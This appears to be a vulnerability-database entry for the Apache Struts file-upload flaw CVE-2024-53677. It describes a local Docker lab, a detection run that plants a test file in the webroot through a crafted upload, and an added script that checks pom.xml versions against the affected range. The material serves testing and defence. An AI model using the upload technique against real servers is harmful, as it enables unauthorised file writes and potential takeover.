Related vulnerability
Title:
Apache Struts security vulnerability
(CVE-2024-53677)
Description: Apache Struts is an open-source project of the Apache Software Foundation (USA), an open-source MVC framework for building enterprise Java web applications. It is shipped as two main framework products, Struts 1 and Struts 2. Apache Struts versions from 2.0.0 up to (but not including) 6.4.0 contain a security vulnerability caused by a flaw in the file upload logic.
Introduction
# Proof-of-Concept
## Setup test environment
```bash
» git clone git@github.com:0xPThree/struts_cve-2024-53677.git
» cd struts_cve-2024-53677
» sudo docker build --ulimit nofile=122880:122880 -m 3G -t struts-6.3.0.1 .
» sudo docker run -p 8081:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name struts-6.3.0.1 struts-6.3.0.1
```
```html
» curl http://127.0.0.1:8081/upload.action
<html>
<head>
<title>File upload</title>
</head>
<body>
<h1>Apache Struts 6.3.0.1</h1>
<p>Welcome to Apache Struts 6.3.0.1 lab. This application is vulnerable to CVE-2023-50164 and CVE-2024-53677.</p>
<form id="upload" name="upload" action="/upload.action;jsessionid=196954CE343A603EC7EE26FFF611D302" method="post" enctype="multipart/form-data">
<table class="wwFormTable">
<tr>
<td class="tdLabel"></td>
<td
class="tdInput"
><input type="file" name="upload" id="upload_upload"/></td>
</tr>
<tr>
<td colspan="2">
<div class="formButton"><input type="submit" value="Submit" id="upload_0"/></div>
</td>
</tr>
</table>
</form>
</body>
</html>
```
---
## Exploit
```bash
» curl http://127.0.0.1:8081/vuln_test.txt
<!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 – Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [/vuln_test.txt] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.98</h3></body></html>
» python3 check.py -u http://127.0.0.1:8081 --upload_endpoint /upload.action
2025-01-07 12:21:20,822 [INFO] Starting detection process...
2025-01-07 12:21:20,822 [INFO] Starting detection for CVE-2024-53677 (S2-067)...
2025-01-07 12:21:20,823 [INFO] Sending test request to upload endpoint: http://127.0.0.1:8081/upload.action
2025-01-07 12:21:20,838 [INFO] [INFO] File upload request succeeded.
2025-01-07 12:21:20,838 [WARNING] [ALERT] File name overwrite detected. Target may be vulnerable!
2025-01-07 12:21:20,838 [INFO] Detection process completed.
» curl http://127.0.0.1:8081/vuln_test.txt
CVE-2024-53677 / S2-067 detection test.
» sudo docker exec -it struts-6.3.0.1 bash
root@b991eecb47b4:/usr/local/tomcat# cd webapps/ROOT
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# ls -al
total 28
drwxr-x--- 5 root root 4096 Jan 7 11:23 .
drwxr-xr-x 1 root root 4096 Jan 7 11:18 ..
drwxr-x--- 2 root root 4096 Jan 7 11:14 forbidden
-rw-r----- 1 root root 226 Jan 7 09:41 index.html
drwxr-x--- 3 root root 4096 Jan 7 11:14 META-INF
-rw-r----- 1 root root 39 Jan 7 11:23 vuln_test.txt
drwxr-x--- 4 root root 4096 Jan 7 11:14 WEB-INF
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# cat vuln_test.txt
CVE-2024-53677 / S2-067 detection test.
```
Check script from: https://github.com/TAM-K592/CVE-2024-53677-S2-067/tree/ALOK
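A defender-side complement to the detection run above, added here as an example and not part of the original PoC repository or of the check script it links: instead of sending an upload request, it reads the `struts2-core` dependency version from a Maven `pom.xml` (such as the `struts-app/pom.xml` listed in the snapshot) and tests it against the affected range given in the description, 2.0.0 up to but not including 6.4.0. The sample POM embedded in the code is constructed for this example, and `parse_version`, `is_affected`, `struts_version_from_pom` and `assess_pom` are names chosen here.

```python
"""Check a Maven pom.xml for an Apache Struts 2 core version inside the
CVE-2024-53677 (S2-067) affected range: 2.0.0 <= version < 6.4.0.
Example code added to this page; not part of the PoC repository."""
import re
import xml.etree.ElementTree as ET
from typing import Dict, Optional, Tuple

# Affected range as stated in the advisory description on this page.
AFFECTED_MIN: Tuple[int, ...] = (2, 0, 0)
FIXED_IN: Tuple[int, ...] = (6, 4, 0)

# Constructed sample POM (not the snapshot's own pom.xml). It uses the
# common pattern of a version property referenced from the dependency,
# pinned to 6.3.0.1, the version the lab above runs.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <groupId>com.example</groupId>
  <artifactId>struts-app</artifactId>
  <version>1.0</version>
  <properties>
    <struts2.version>6.3.0.1</struts2.version>
  </properties>
  <dependencies>
    <dependency>
      <groupId>org.apache.struts</groupId>
      <artifactId>struts2-core</artifactId>
      <version>${struts2.version}</version>
    </dependency>
  </dependencies>
</project>
"""


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '6.3.0.1' or '2.5.33' into an int tuple; a trailing qualifier
    such as '-SNAPSHOT' is ignored for range purposes."""
    m = re.match(r"(\d+(?:\.\d+)*)", version.strip())
    if not m:
        raise ValueError(f"unparseable version: {version!r}")
    return tuple(int(p) for p in m.group(1).split("."))


def is_affected(version: str) -> bool:
    """True when the version lies inside [2.0.0, 6.4.0).
    Tuple comparison orders four-part versions like 6.3.0.1 correctly."""
    v = parse_version(version)
    return AFFECTED_MIN <= v < FIXED_IN


def _local(tag: str) -> str:
    # Strip the Maven XML namespace prefix ("{http://...}tag") from a tag name.
    return tag.rsplit("}", 1)[-1]


def struts_version_from_pom(pom_xml: str) -> Optional[str]:
    """Return the declared struts2-core version, resolving a ${property}
    reference against <properties>; None if no struts2-core dependency."""
    root = ET.fromstring(pom_xml)
    props: Dict[str, str] = {}
    for el in root.iter():
        if _local(el.tag) == "properties":
            for prop in el:
                props[_local(prop.tag)] = (prop.text or "").strip()
    for dep in root.iter():
        if _local(dep.tag) != "dependency":
            continue
        fields = {_local(c.tag): (c.text or "").strip() for c in dep}
        if fields.get("groupId") == "org.apache.struts" and fields.get("artifactId") == "struts2-core":
            version = fields.get("version", "")
            ref = re.fullmatch(r"\$\{([^}]+)\}", version)
            if ref:
                version = props.get(ref.group(1), "")
            return version or None
    return None


def assess_pom(pom_xml: str) -> Dict[str, object]:
    """Summarise a POM: which struts2-core version it pins and whether that
    version falls inside the affected range."""
    version = struts_version_from_pom(pom_xml)
    return {"version": version, "affected": bool(version) and is_affected(version)}


if __name__ == "__main__":
    # Constructed POM pins 6.3.0.1, which is inside the affected range.
    print(assess_pom(SAMPLE_POM))
```

The POM states the declared version, not necessarily the deployed one; for a running webapp, the `struts2-core` jar under `WEB-INF/lib` is the ground truth, and the same `is_affected` check can be applied to the version in its file name.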
File snapshot
```text
[4.0K] /data/pocs/2d3700ef2b4fbeee9e4dca29dcd8e4a6e1f6e5f9
├── [2.7K] check.py
├── [1.3K] context.xml
├── [ 561] Dockerfile
├── [3.4K] README.md
├── [4.0K] struts-app
│   ├── [8.9K] mvnw
│   ├── [5.7K] mvnw.cmd
│   ├── [3.7K] pom.xml
│   └── [4.0K] src
│       └── [4.0K] main
│           ├── [4.0K] java
│           │   └── [4.0K] org
│           │       └── [4.0K] trackflaw
│           │           └── [4.0K] example
│           │               └── [2.2K] Upload.java
│           ├── [4.0K] resources
│           │   └── [ 870] struts.xml
│           └── [4.0K] webapp
│               ├── [4.0K] forbidden
│               ├── [ 226] index.html
│               └── [4.0K] WEB-INF
│                   ├── [ 579] error.jsp
│                   ├── [ 650] success.jsp
│                   ├── [ 716] upload.jsp
│                   └── [1.1K] web.xml
└── [ 219] tomcat-users.xml

11 directories, 15 files
```
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source has become unavailable or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.